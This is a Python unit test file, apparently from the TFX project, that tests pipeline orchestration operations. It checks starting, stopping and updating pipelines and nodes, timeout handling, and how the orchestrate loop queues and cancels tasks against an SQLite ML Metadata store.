from tfx.orchestration.experimental.core import service_jobs
from tfx.orchestration.experimental.core import sync_pipeline_task_gen
from tfx.orchestration.experimental.core import task as task_lib
from tfx.orchestration.experimental.core import task_gen_utils
from tfx.orchestration.experimental.core import task_queue as tq
from tfx.orchestration.experimental.core import test_utils
from tfx.orchestration.experimental.core.task_schedulers import manual_task_scheduler
from tfx.orchestration.experimental.core.testing import test_async_pipeline
from tfx.orchestration.experimental.core.testing import test_manual_node
from tfx.orchestration.portable import execution_publish_utils
from tfx.orchestration.portable import runtime_parameter_utils
from tfx.orchestration.portable.mlmd import context_lib
from tfx.orchestration.portable.mlmd import execution_lib
from tfx.proto.orchestration import pipeline_pb2
from tfx.utils import status as status_lib
from ml_metadata.proto import metadata_store_pb2
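# Helper: builds a minimal Pipeline IR for tests; SYNC pipelines additionally get a
# fixed pipeline_run_id, which the sync orchestration path expects.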
def _test_pipeline(pipeline_id,
execution_mode: pipeline_pb2.Pipeline.ExecutionMode = (
pipeline_pb2.Pipeline.ASYNC)):
pipeline = pipeline_pb2.Pipeline()
pipeline.pipeline_info.id = pipeline_id
pipeline.execution_mode = execution_mode
if execution_mode == pipeline_pb2.Pipeline.SYNC:
pipeline.runtime_spec.pipeline_run_id.field_value.string_value = 'run0'
return pipeline
class PipelineOpsTest(test_utils.TfxTest, parameterized.TestCase):
def setUp(self):
super().setUp()
pipeline_root = os.path.join(
os.environ.get('TEST_UNDECLARED_OUTPUTS_DIR', self.get_temp_dir()),
self.id())
# Makes sure multiple connections within a test always connect to the same
# MLMD instance.
metadata_path = os.path.join(pipeline_root, 'metadata', 'metadata.db')
self._metadata_path = metadata_path
connection_config = metadata.sqlite_metadata_connection_config(
metadata_path)
connection_config.sqlite.SetInParent()
self._mlmd_connection = metadata.Metadata(
connection_config=connection_config)
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_initiate_pipeline_start(self, pipeline):
with self._mlmd_connection as m:
# Initiate a pipeline start.
with pipeline_ops.initiate_pipeline_start(m, pipeline) as pipeline_state1:
self.assertProtoPartiallyEquals(
pipeline, pipeline_state1.pipeline, ignored_fields=['runtime_spec'])
self.assertEqual(metadata_store_pb2.Execution.NEW,
pipeline_state1.get_pipeline_execution_state())
# Initiate another pipeline start.
pipeline2 = _test_pipeline('pipeline2')
with pipeline_ops.initiate_pipeline_start(m,
pipeline2) as pipeline_state2:
self.assertEqual(pipeline2, pipeline_state2.pipeline)
self.assertEqual(metadata_store_pb2.Execution.NEW,
pipeline_state2.get_pipeline_execution_state())
# Error if attempted to initiate when old one is active.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.initiate_pipeline_start(m, pipeline)
self.assertEqual(status_lib.Code.ALREADY_EXISTS,
exception_context.exception.code)
# Fine to initiate after the previous one is inactive.
with pipeline_state1:
pipeline_state1.set_pipeline_execution_state(
metadata_store_pb2.Execution.COMPLETE)
with pipeline_ops.initiate_pipeline_start(m, pipeline) as pipeline_state3:
self.assertEqual(metadata_store_pb2.Execution.NEW,
pipeline_state3.get_pipeline_execution_state())
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_stop_pipeline_non_existent_or_inactive(self, pipeline):
with self._mlmd_connection as m:
# Stop pipeline without creating one.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.stop_pipeline(m,
task_lib.PipelineUid.from_pipeline(pipeline))
self.assertEqual(status_lib.Code.NOT_FOUND,
exception_context.exception.code)
# Initiate pipeline start and mark it completed.
pipeline_ops.initiate_pipeline_start(m, pipeline)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
pipeline_state.initiate_stop(status_lib.Status(code=status_lib.Code.OK))
pipeline_state.set_pipeline_execution_state(
metadata_store_pb2.Execution.COMPLETE)
# Try to initiate stop again.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.stop_pipeline(m, pipeline_uid)
self.assertEqual(status_lib.Code.NOT_FOUND,
exception_context.exception.code)
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_stop_pipeline_wait_for_inactivation(self, pipeline):
with self._mlmd_connection as m:
pipeline_state = pipeline_ops.initiate_pipeline_start(m, pipeline)
def _inactivate(pipeline_state):
time.sleep(2.0)
with pipeline_ops._PIPELINE_OPS_LOCK:
with pipeline_state:
pipeline_state.set_pipeline_execution_state(
metadata_store_pb2.Execution.COMPLETE)
thread = threading.Thread(target=_inactivate, args=(pipeline_state,))
thread.start()
pipeline_ops.stop_pipeline(
m, task_lib.PipelineUid.from_pipeline(pipeline), timeout_secs=20.0)
thread.join()
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_stop_pipeline_wait_for_inactivation_timeout(self, pipeline):
with self._mlmd_connection as m:
pipeline_ops.initiate_pipeline_start(m, pipeline)
with self.assertRaisesRegex(
status_lib.StatusNotOkError,
'Timed out.*waiting for execution inactivation.'
) as exception_context:
pipeline_ops.stop_pipeline(
m, task_lib.PipelineUid.from_pipeline(pipeline), timeout_secs=1.0)
self.assertEqual(status_lib.Code.DEADLINE_EXCEEDED,
exception_context.exception.code)
def test_stop_node_no_active_executions(self):
pipeline = test_async_pipeline.create_pipeline()
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
node_uid = task_lib.NodeUid(node_id='my_trainer', pipeline_uid=pipeline_uid)
with self._mlmd_connection as m:
pstate.PipelineState.new(m, pipeline)
pipeline_ops.stop_node(m, node_uid)
pipeline_state = pstate.PipelineState.load(m, pipeline_uid)
# The node state should be STOPPING even when node is inactive to prevent
# future triggers.
with pipeline_state:
node_state = pipeline_state.get_node_state(node_uid)
self.assertEqual(status_lib.Code.CANCELLED, node_state.status.code)
self.assertEqual(pstate.NodeState.STOPPING, node_state.state)
# Restart node.
pipeline_state = pipeline_ops.initiate_node_start(m, node_uid)
with pipeline_state:
node_state = pipeline_state.get_node_state(node_uid)
self.assertEqual(pstate.NodeState.STARTING, node_state.state)
def test_stop_node_wait_for_inactivation(self):
pipeline = test_async_pipeline.create_pipeline()
trainer = pipeline.nodes[2].pipeline_node
test_utils.fake_component_output(
self._mlmd_connection, trainer, active=True)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
node_uid = task_lib.NodeUid(node_id='my_trainer', pipeline_uid=pipeline_uid)
with self._mlmd_connection as m:
pstate.PipelineState.new(m, pipeline)
def _inactivate(execution):
time.sleep(2.0)
with pipeline_ops._PIPELINE_OPS_LOCK:
execution.last_known_state = metadata_store_pb2.Execution.COMPLETE
m.store.put_executions([execution])
execution = task_gen_utils.get_executions(m, trainer)[0]
thread = threading.Thread(
target=_inactivate, args=(copy.deepcopy(execution),))
thread.start()
pipeline_ops.stop_node(m, node_uid, timeout_secs=5.0)
thread.join()
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(node_uid)
self.assertEqual(pstate.NodeState.STOPPING, node_state.state)
# Restart node.
with pipeline_ops.initiate_node_start(m, node_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(node_uid)
self.assertEqual(pstate.NodeState.STARTING, node_state.state)
def test_stop_node_wait_for_inactivation_timeout(self):
pipeline = test_async_pipeline.create_pipeline()
trainer = pipeline.nodes[2].pipeline_node
test_utils.fake_component_output(
self._mlmd_connection, trainer, active=True)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
node_uid = task_lib.NodeUid(node_id='my_trainer', pipeline_uid=pipeline_uid)
with self._mlmd_connection as m:
pstate.PipelineState.new(m, pipeline)
with self.assertRaisesRegex(
status_lib.StatusNotOkError,
'Timed out.*waiting for execution inactivation.'
) as exception_context:
pipeline_ops.stop_node(m, node_uid, timeout_secs=1.0)
self.assertEqual(status_lib.Code.DEADLINE_EXCEEDED,
exception_context.exception.code)
# Even if `wait_for_inactivation` times out, the node should be in state
# STOPPING or STOPPED to prevent future triggers.
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(node_uid)
self.assertIn(node_state.state,
(pstate.NodeState.STOPPING, pstate.NodeState.STOPPED))
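# The orchestrate() tests below patch the sync/async task generators so the loop's
# behaviour can be asserted purely through the task queue and MLMD state.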
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_orchestrate_active_pipelines(self, mock_async_task_gen,
mock_sync_task_gen):
with self._mlmd_connection as m:
# Sync and async active pipelines.
async_pipelines = [
_test_pipeline('pipeline1'),
_test_pipeline('pipeline2'),
]
sync_pipelines = [
_test_pipeline('pipeline3', pipeline_pb2.Pipeline.SYNC),
_test_pipeline('pipeline4', pipeline_pb2.Pipeline.SYNC),
]
for pipeline in async_pipelines + sync_pipelines:
pipeline_ops.initiate_pipeline_start(m, pipeline)
# Active executions for active async pipelines.
mock_async_task_gen.return_value.generate.side_effect = [
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
async_pipelines[0]),
node_id='Transform'))
],
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
async_pipelines[1]),
node_id='Trainer'))
],
]
# Active executions for active sync pipelines.
mock_sync_task_gen.return_value.generate.side_effect = [
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
sync_pipelines[0]),
node_id='Trainer'))
],
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
sync_pipelines[1]),
node_id='Validator'))
],
]
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue,
service_jobs.DummyServiceJobManager())
self.assertEqual(2, mock_async_task_gen.return_value.generate.call_count)
self.assertEqual(2, mock_sync_task_gen.return_value.generate.call_count)
# Verify that tasks are enqueued in the expected order.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline1', 'Transform'), task.node_uid)
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline2', 'Trainer'), task.node_uid)
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline3', 'Trainer'), task.node_uid)
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline4', 'Validator'), task.node_uid)
self.assertTrue(task_queue.is_empty())
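# For a stop-initiated pipeline, orchestrate() should cancel queued tasks, request
# cancellation of active executions, stop service jobs, and mark the pipeline
# CANCELED only once no node executions remain active.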
@parameterized.parameters(
_test_pipeline('pipeline1'),
_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC))
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
@mock.patch.object(task_gen_utils, 'generate_task_from_active_execution')
def test_orchestrate_stop_initiated_pipelines(self, pipeline,
mock_gen_task_from_active,
mock_async_task_gen,
mock_sync_task_gen):
with self._mlmd_connection as m:
pipeline.nodes.add().pipeline_node.node_info.id = 'ExampleGen'
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline.nodes.add().pipeline_node.node_info.id = 'Evaluator'
mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
mock_service_job_manager.is_pure_service_node.side_effect = (
lambda _, node_id: node_id == 'ExampleGen')
mock_service_job_manager.is_mixed_service_node.side_effect = (
lambda _, node_id: node_id == 'Transform')
pipeline_ops.initiate_pipeline_start(m, pipeline)
with pstate.PipelineState.load(
m, task_lib.PipelineUid.from_pipeline(pipeline)) as pipeline_state:
pipeline_state.initiate_stop(
status_lib.Status(code=status_lib.Code.CANCELLED))
pipeline_execution_id = pipeline_state.execution_id
task_queue = tq.TaskQueue()
# For the stop-initiated pipeline, "Transform" execution task is in queue,
# "Trainer" has an active execution in MLMD but no task in queue,
# "Evaluator" has no active execution.
task_queue.enqueue(
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(pipeline),
node_id='Transform')))
transform_task = task_queue.dequeue() # simulates task being processed
mock_gen_task_from_active.side_effect = [
test_utils.create_exec_node_task(
node_uid=task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(pipeline),
node_id='Trainer'),
is_cancelled=True), None, None, None, None
]
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
# There are no active pipelines so these shouldn't be called.
mock_async_task_gen.assert_not_called()
mock_sync_task_gen.assert_not_called()
# stop_node_services should be called for ExampleGen which is a pure
# service node.
mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'ExampleGen')
mock_service_job_manager.reset_mock()
task_queue.task_done(transform_task) # Pop out transform task.
# CancelNodeTask for the "Transform" ExecNodeTask should be next.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual('Transform', task.node_uid.node_id)
# ExecNodeTask (with is_cancelled=True) for "Trainer" is next.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual('Trainer', task.node_uid.node_id)
self.assertTrue(task.is_cancelled)
self.assertTrue(task_queue.is_empty())
mock_gen_task_from_active.assert_has_calls([
mock.call(
m,
pipeline_state.pipeline,
pipeline.nodes[2].pipeline_node,
mock.ANY,
is_cancelled=True),
mock.call(
m,
pipeline_state.pipeline,
pipeline.nodes[3].pipeline_node,
mock.ANY,
is_cancelled=True)
])
self.assertEqual(2, mock_gen_task_from_active.call_count)
# Pipeline execution should continue to be active since active node
# executions were found in the last call to `orchestrate`.
[execution] = m.store.get_executions_by_id([pipeline_execution_id])
self.assertTrue(execution_lib.is_execution_active(execution))
# Call `orchestrate` again; this time there are no more active node
# executions so the pipeline should be marked as cancelled.
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
self.assertTrue(task_queue.is_empty())
[execution] = m.store.get_executions_by_id([pipeline_execution_id])
self.assertEqual(metadata_store_pb2.Execution.CANCELED,
execution.last_known_state)
# stop_node_services should be called on both ExampleGen and Transform
# which are service nodes.
mock_service_job_manager.stop_node_services.assert_has_calls(
[mock.call(mock.ANY, 'ExampleGen'),
mock.call(mock.ANY, 'Transform')],
any_order=True)
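# For an update-initiated pipeline, nodes are paused (cancel tasks with pause=True)
# and the pipeline stays in the update-initiated state until all outstanding
# ExecNodeTasks have been drained.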
@parameterized.parameters(
_test_pipeline('pipeline1'),
_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC))
def test_orchestrate_update_initiated_pipelines(self, pipeline):
with self._mlmd_connection as m:
pipeline.nodes.add().pipeline_node.node_info.id = 'ExampleGen'
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline.nodes.add().pipeline_node.node_info.id = 'Evaluator'
mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
mock_service_job_manager.is_pure_service_node.side_effect = (
lambda _, node_id: node_id == 'ExampleGen')
mock_service_job_manager.is_mixed_service_node.side_effect = (
lambda _, node_id: node_id == 'Transform')
pipeline_ops.initiate_pipeline_start(m, pipeline)
task_queue = tq.TaskQueue()
for node_id in ('Transform', 'Trainer', 'Evaluator'):
task_queue.enqueue(
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(pipeline),
node_id=node_id)))
pipeline_state = pipeline_ops._initiate_pipeline_update(m, pipeline)
with pipeline_state:
self.assertTrue(pipeline_state.is_update_initiated())
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
# stop_node_services should be called for ExampleGen which is a pure
# service node.
mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'ExampleGen')
mock_service_job_manager.reset_mock()
# Simulate completion of all the exec node tasks.
for node_id in ('Transform', 'Trainer', 'Evaluator'):
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(node_id, task.node_uid.node_id)
# Verify that cancellation tasks were enqueued in the last `orchestrate`
# call, and dequeue them.
for node_id in ('Transform', 'Trainer', 'Evaluator'):
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual(node_id, task.node_uid.node_id)
self.assertTrue(task.pause)
self.assertTrue(task_queue.is_empty())
# Pipeline continues to be in update initiated state until all
# ExecNodeTasks have been dequeued (which was not the case when last
# `orchestrate` call was made).
with pipeline_state:
self.assertTrue(pipeline_state.is_update_initiated())
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
# stop_node_services should be called for Transform (mixed service node)
# too since corresponding ExecNodeTask has been processed.
mock_service_job_manager.stop_node_services.assert_has_calls(
[mock.call(mock.ANY, 'ExampleGen'),
mock.call(mock.ANY, 'Transform')])
# Pipeline should no longer be in update-initiated state but be active.
with pipeline_state:
self.assertFalse(pipeline_state.is_update_initiated())
self.assertTrue(pipeline_state.is_active())
def test_update_pipeline_waits_for_update_application(self):
with self._mlmd_connection as m:
pipeline = _test_pipeline('pipeline1')
pipeline_state = pipeline_ops.initiate_pipeline_start(m, pipeline)
def _apply_update(pipeline_state):
# Wait for the pipeline to be in update initiated state.
while True:
with pipeline_state:
if pipeline_state.is_update_initiated():
break
time.sleep(0.5)
# Now apply the update.
with pipeline_ops._PIPELINE_OPS_LOCK:
with pipeline_state:
pipeline_state.apply_pipeline_update()
thread = threading.Thread(target=_apply_update, args=(pipeline_state,))
thread.start()
pipeline_ops.update_pipeline(m, pipeline, timeout_secs=10.0)
thread.join()
def test_update_pipeline_wait_for_update_timeout(self):
with self._mlmd_connection as m:
pipeline = _test_pipeline('pipeline1')
pipeline_ops.initiate_pipeline_start(m, pipeline)
with self.assertRaisesRegex(status_lib.StatusNotOkError,
'Timed out.*waiting for pipeline update'):
pipeline_ops.update_pipeline(m, pipeline, timeout_secs=3.0)
@parameterized.parameters(
_test_pipeline('pipeline1'),
_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC))
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
@mock.patch.object(task_gen_utils, 'generate_task_from_active_execution')
def test_active_pipelines_with_stopped_nodes(self, pipeline,
mock_gen_task_from_active,
mock_async_task_gen,
mock_sync_task_gen):
if pipeline.execution_mode == pipeline_pb2.Pipeline.SYNC:
mock_task_gen = mock_sync_task_gen
else:
mock_task_gen = mock_async_task_gen
with self._mlmd_connection as m:
pipeline.nodes.add().pipeline_node.node_info.id = 'ExampleGen'
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline.nodes.add().pipeline_node.node_info.id = 'Evaluator'
mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
mock_service_job_manager.is_pure_service_node.side_effect = (
lambda _, node_id: node_id == 'ExampleGen')
example_gen_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[0].pipeline_node)
transform_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[1].pipeline_node)
transform_task = test_utils.create_exec_node_task(
node_uid=transform_node_uid)
trainer_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[2].pipeline_node)
trainer_task = test_utils.create_exec_node_task(node_uid=trainer_node_uid)
evaluator_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[3].pipeline_node)
evaluator_task = test_utils.create_exec_node_task(
node_uid=evaluator_node_uid)
cancelled_evaluator_task = test_utils.create_exec_node_task(
node_uid=evaluator_node_uid, is_cancelled=True)
pipeline_ops.initiate_pipeline_start(m, pipeline)
with pstate.PipelineState.load(
m, task_lib.PipelineUid.from_pipeline(pipeline)) as pipeline_state:
# Stop example-gen, trainer and evaluator.
with pipeline_state.node_state_update_context(
example_gen_node_uid) as node_state:
node_state.update(pstate.NodeState.STOPPING,
status_lib.Status(code=status_lib.Code.CANCELLED))
with pipeline_state.node_state_update_context(
trainer_node_uid) as node_state:
node_state.update(pstate.NodeState.STOPPING,
status_lib.Status(code=status_lib.Code.CANCELLED))
with pipeline_state.node_state_update_context(
evaluator_node_uid) as node_state:
node_state.update(pstate.NodeState.STOPPING,
status_lib.Status(code=status_lib.Code.ABORTED))
task_queue = tq.TaskQueue()
# Simulate a new transform execution being triggered.
mock_task_gen.return_value.generate.return_value = [transform_task]
# Simulate ExecNodeTask for trainer already present in the task queue.
task_queue.enqueue(trainer_task)
# Simulate Evaluator having an active execution in MLMD.
      mock_gen_task_from_active.side_effect = [cancelled_evaluator_task]
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
self.assertEqual(1, mock_task_gen.return_value.generate.call_count)
# stop_node_services should be called on example-gen which is a pure
# service node.
mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'ExampleGen')
# Verify that tasks are enqueued in the expected order:
# Pre-existing trainer task.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertEqual(trainer_task, task)
# CancelNodeTask for trainer.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual(trainer_node_uid, task.node_uid)
# ExecNodeTask with is_cancelled=True for evaluator.
task = task_queue.dequeue()
task_queue.task_done(task)
      self.assertEqual(cancelled_evaluator_task, task)
# ExecNodeTask for newly triggered transform node.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertEqual(transform_task, task)
# No more tasks.
self.assertTrue(task_queue.is_empty())
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
def test_handling_finalize_pipeline_task(self, task_gen):
with self._mlmd_connection as m:
pipeline = _test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)
pipeline_ops.initiate_pipeline_start(m, pipeline)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
finalize_reason = status_lib.Status(
code=status_lib.Code.ABORTED, message='foo bar')
task_gen.return_value.generate.side_effect = [
[
task_lib.FinalizePipelineTask(
pipeline_uid=pipeline_uid, status=finalize_reason)
],
]
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue,
service_jobs.DummyServiceJobManager())
task_gen.return_value.generate.assert_called_once()
self.assertTrue(task_queue.is_empty())
# Load pipeline state and verify stop initiation.
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
self.assertEqual(finalize_reason,
pipeline_state.stop_initiated_reason())
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_handling_finalize_node_task(self, task_gen):
with self._mlmd_connection as m:
pipeline = _test_pipeline('pipeline1')
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline_ops.initiate_pipeline_start(m, pipeline)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
finalize_reason = status_lib.Status(
code=status_lib.Code.ABORTED, message='foo bar')
transform_node_uid = task_lib.NodeUid(
pipeline_uid=pipeline_uid, node_id='Transform')
trainer_node_uid = task_lib.NodeUid(
pipeline_uid=pipeline_uid, node_id='Trainer')
task_gen.return_value.generate.side_effect = [
[
test_utils.create_exec_node_task(transform_node_uid),
task_lib.FinalizeNodeTask(
node_uid=trainer_node_uid, status=finalize_reason)
],
]
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue,
service_jobs.DummyServiceJobManager())
task_gen.return_value.generate.assert_called_once()
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(transform_node_uid, task.node_uid)
# Load pipeline state and verify trainer node state.
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(trainer_node_uid)
self.assertEqual(pstate.NodeState.STOPPING, node_state.state)
self.assertEqual(finalize_reason, node_state.status)
def test_to_status_not_ok_error_decorator(self):
@pipeline_ops._to_status_not_ok_error
def fn1():
raise RuntimeError('test error 1')
@pipeline_ops._to_status_not_ok_error
def fn2():
raise status_lib.StatusNotOkError(
code=status_lib.Code.ALREADY_EXISTS, message='test error 2')
with self.assertRaisesRegex(status_lib.StatusNotOkError,
'test error 1') as ctxt:
fn1()
self.assertEqual(status_lib.Code.UNKNOWN, ctxt.exception.code)
with self.assertRaisesRegex(status_lib.StatusNotOkError,
'test error 2') as ctxt:
fn2()
self.assertEqual(status_lib.Code.ALREADY_EXISTS, ctxt.exception.code)
@parameterized.parameters(
_test_pipeline('pipeline1'),
_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC))
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_executor_node_stop_then_start_flow(self, pipeline,
mock_async_task_gen,
mock_sync_task_gen):
service_job_manager = service_jobs.DummyServiceJobManager()
with self._mlmd_connection as m:
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
trainer_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[0].pipeline_node)
# Start pipeline and stop trainer.
pipeline_ops.initiate_pipeline_start(m, pipeline)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
with pipeline_state.node_state_update_context(
trainer_node_uid) as node_state:
node_state.update(pstate.NodeState.STOPPING,
status_lib.Status(code=status_lib.Code.CANCELLED))
task_queue = tq.TaskQueue()
# Simulate ExecNodeTask for trainer already present in the task queue.
trainer_task = test_utils.create_exec_node_task(node_uid=trainer_node_uid)
task_queue.enqueue(trainer_task)
pipeline_ops.orchestrate(m, task_queue, service_job_manager)
# Dequeue pre-existing trainer task.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertEqual(trainer_task, task)
# Dequeue CancelNodeTask for trainer.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual(trainer_node_uid, task.node_uid)
self.assertTrue(task_queue.is_empty())
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(trainer_node_uid)
self.assertEqual(pstate.NodeState.STOPPING, node_state.state)
self.assertEqual(status_lib.Code.CANCELLED, node_state.status.code)
pipeline_ops.orchestrate(m, task_queue, service_job_manager)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(trainer_node_uid)
self.assertEqual(pstate.NodeState.STOPPED, node_state.state)
self.assertEqual(status_lib.Code.CANCELLED, node_state.status.code)
pipeline_ops.initiate_node_start(m, trainer_node_uid)
pipeline_ops.orchestrate(m, task_queue, service_job_manager)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(trainer_node_uid)
self.assertEqual(pstate.NodeState.STARTED, node_state.state)
@parameterized.parameters(
_test_pipeline('pipeline1'),
_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC))
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_pure_service_node_stop_then_start_flow(self, pipeline,
mock_async_task_gen,
mock_sync_task_gen):
with self._mlmd_connection as m:
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
pipeline.nodes.add().pipeline_node.node_info.id = 'ExampleGen'
mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
mock_service_job_manager.is_pure_service_node.return_value = True
example_gen_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[0].pipeline_node)
pipeline_ops.initiate_pipeline_start(m, pipeline)
with pstate.PipelineState.load(
m, task_lib.PipelineUid.from_pipeline(pipeline)) as pipeline_state:
with pipeline_state.node_state_update_context(
example_gen_node_uid) as node_state:
node_state.update(pstate.NodeState.STOPPING,
status_lib.Status(code=status_lib.Code.CANCELLED))
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
# stop_node_services should be called for ExampleGen which is a pure
# service node.
mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'ExampleGen')
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(example_gen_node_uid)
self.assertEqual(pstate.NodeState.STOPPED, node_state.state)
self.assertEqual(status_lib.Code.CANCELLED, node_state.status.code)
pipeline_ops.initiate_node_start(m, example_gen_node_uid)
